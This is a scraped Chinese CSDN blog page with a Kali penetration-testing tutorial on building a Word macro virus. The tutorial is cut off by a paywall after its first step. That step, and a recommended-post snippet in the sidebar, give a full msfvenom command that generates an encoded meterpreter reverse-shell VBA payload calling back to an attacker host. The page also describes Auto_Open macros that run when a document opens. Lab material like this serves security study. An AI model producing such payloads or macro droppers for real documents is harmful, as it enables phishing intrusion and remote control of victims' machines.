Kali渗透测试:使用Word宏病毒进行渗透攻击

最新推荐文章于 2024-05-13 14:29:04 发布
最新推荐文章于 2024-05-13 14:29:04 发布
阅读量503 收藏 2
点赞数
分类专栏: 面试 学习路线 阿里巴巴 文章标签: 安全 linux web安全 后端 unity
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54850604/article/details/124815766
版权
Kali渗透测试:使用宏病毒进行渗透攻击VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或
摘要由CSDN通过智能技术生成

Kali渗透测试:使用宏病毒进行渗透攻击

VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。

构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或直接删除其他文件等。Word宏和其他样式存储在模版DOT文件中, 因此总是把Word文件转成模版,再将其存储为宏。

实 验 环 境

攻击机:Linux kali 5.10.0 IP: 192.168.68.125

靶机:IE11-Win81

操 作 步 骤

1. 使用msfvenom生成VBA被控端

在Kali Linux中使用msfvenom命令生成一个VBA类型的被控端,输入如下命令:

┌──(root??kali)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.68.125 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

该被控端可以分为两个部分。第一个部分是包括Auto_Open在内的几个函数,如下图所示:

最低0.47元/天 解锁文章
澎湖Java架构师
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
使用Kali Linux Metasploit 复现 word
xujing19920814的博客
10-01 1540
使用Kali Linux Metasploit 复现 宏
网络安全kali之利用宏感染word文档获取shell
xueshenlaila的博客
03-25 8171
首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。 ┌──(root💀xuegod53)-[~] └─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe 执行完成后会生成2段代码 第一段代码是MACRO CODE [ˈmækrəʊ k
复现|使用Kali生成木马,渗透Windows系统
最新发布
Maricopig的博客
05-13 818
简单复现了使用kali中的msfvenom工具生成木马文件,并在靶机中执行后,展示后渗透阶段可操作内容。
网络安全学习日志(8)word简单宏病毒的制作
qq_41819426的博客
01-17 7765
环境及使用工具 靶机:windows7 攻击机:kali 本地主机:windows10 用于word文件生成 软件:CS4.0 对于cs的搭建,我们这里不做赘述 实验步骤: 1.宏病毒的制作 1.1创建监听 首先我们打开我们的cs4.0,点击创建一个新的监听 监听地址为你的服务端地址(这里是我的kali地址) 1.2通过attack栏来得到word宏病毒的脚本 复制其内容即可 1.3创建一个word文件,并通过视图点击创建宏 注意:宏的位置选项一定要选择最后一项,即文件的本地位置 将代码复制后保
Kali Linux渗透测试技术详解
02-19
介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限提升、密码攻击、无线网络攻击、...
KaliLinux渗透测试五步曲
03-23
不管渗透测试者的起点是白盒测试、黑盒测试,还是灰盒测试,在用Kali或其它工具进行渗透测试时,总要遵循一些步骤。  KaliLinux的设计目的是渗透测试。不管渗透测试者的起点是白盒测试、黑盒测试,还是灰盒测试,在...
Kali 渗透测试 pdf
04-08
Kali 渗透测试 pdf
信息安全技术(一)渗透攻击
m0_73736174的博客
05-27 1943
Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架介绍:客户端攻击总是一个有趣的话题,并成为今日攻击者的主要攻击目标。随着网络管理员和软件开发人员加强周边环境,测试人员需要找到一种方法让受害者为他们进入网络打开大门。客户端攻击需要用户交互,例如诱使用户点击链接,打开文档或以某种方式进入恶意网站。
宏病毒学习总结
bcbobo21cn的专栏
04-03 5256
宏病毒及其防治方法总结 http://www.educity.cn/labs/563436.html   如果说宏病毒的出现曾经给反病毒软件厂商出了一道难题的话,那么电脑网络特别是因特网的出现在给人们的信息 交流带来极大方便的同时,也给计算机病毒、特别是宏病毒的传播提供了空前便利的条件,今天的计算机用户比以往任 何时候都更加真实地面对它的威胁。      一、宏
linux 邮件文件名 病毒,文件型File/Macro病毒的捕获
weixin_28863779的博客
05-12 261
二、文件型File/Macro病毒的捕获如果你怀疑病毒是文件型,将C盘根目录下的command.com文件拷贝到软盘上,取名为command,即去掉扩展名。如果你怀疑病毒是MS Word宏病毒,将C:\Program Files\Microsoft Office\Templates目录下的“normal.dot”文件和C:\Program Files\Microsoft Office\Office...
office 宏病毒分析
CMC_HHM的博客
03-25 1983
1、样本信息 在网上下载样本,是一个word宏病毒 名称 713-288-4192.doc MD5 61F1A99292A199F867B168B76FC8CC74 SHA1 967DA912065D014C275463917D236836967B27CA CRC32 A117A12E 2、分析工具准备 在linux平台下安装 安装依赖包 wget...
关于使用Cobalt Strike制作宏病毒
m0_52027565的博客
07-08 1949
关于使用Cobalt Strike制作宏病毒 事情的起因经过是这样的,那天晚上我正在埋头学习,突然小A走了过了,过来说他喜欢班花小B很久了,我一脸不相信的看着他,好家伙,竟然忍了整整一年,大一不表白,现在晚了吧?我看来看小A心想这小子突然开窍了吗?结果现实给了我一巴掌,小A说大一就想表白了,可他自己不确定小B到底喜不喜欢他,就一直拖着,直到大二。想让我帮忙查查小B的喜好,然后“投其所好”直接表白。我看在他一年单相思(不对是烧烤+啤酒)的份上,不忍心看着他单着,于是同意帮小A帮查查小B的喜好。...
Kali-linux渗透攻击应用
weixin_34138377的博客
04-18 3310
前面依次介绍了Armitage、MSFCONSOLE和MSFCLI接口的概念及使用。本节将介绍使用MSFCONSOLE工具渗透攻击MySQL数据库服务、PostgreSQL数据库服务、Tomcat服务和PDF文件等。 6.4.1 渗透攻击MySQL数据库服务 MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,目前属于Oracle公司。在Metasploitable系统中...
KaLi做木马渗透实战案例
开摆工作室(kbai.cc)
04-04 4773
KaLi做木马渗透实战案例
宏病毒混淆分析
A_ZHAZHAL的博客
03-05 841
前言 很早之前就说要分析宏病毒,一直没机会,现在终于有空闲时间来分析一个混淆的比较厉害的宏病毒了。 静态分析 分析宏病毒时,可以利用 oledump.py 来将宏代码提取出来再进行分析。 使用命令 python oledump.py 文件名,即可查看文件流信息。 下图中的 M 表示该段中有宏代码。 python oledump.py -s 8 -v 11.dat >1.txt 可以将8段...
精通Kali Linux 高级渗透测试2023版本,英文原版
07-12
Kali Linux作为一款强大的开源渗透测试工具,是学习者和专业渗透测试人员的必备资源,它提供了广泛的工具集和攻击模拟环境,以便进行系统评估、漏洞探测和道德黑客活动。 书中内容涵盖了从基础配置到高级技术的全面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值